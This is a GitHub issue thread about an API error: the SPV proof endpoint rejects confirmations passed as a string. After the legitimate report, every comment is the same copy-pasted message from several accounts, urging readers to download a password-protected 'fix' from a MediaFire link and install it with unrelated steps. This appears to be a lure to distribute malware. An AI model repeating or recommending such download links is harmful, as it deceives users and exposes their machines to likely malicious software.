### ISSUE TITLE
Exception in the API to get proof of a Bitcoin transaction from the SPV service

### ISSUE THREAD

**Issue by Dawn-githup** [ckb-cell/btc-assets-api#215]
```
curl --location --request GET 'https://213.assets-api-342ddd42.nip.io/rgbpp/v1/btc-spv/proof?btc_txid=f52e35181e3b1edef0e06bbf2b5fee2a6bd0f628fdb2472146fc87f77155f82a&confirmations=1' \
--header 'Authorization: Bearer ***' \
--header 'origin: https://api.testnet.rgbpp.io' \
--header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
--header 'Accept: */*' \
--header 'Host: 213.assets-api-342ddd42.nip.io' \
--header 'Connection: keep-alive'
```

error:
```
{
    "code": -32602,
    "message": "Invalid params: invalid type: string \"1\", expected u32."
}
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
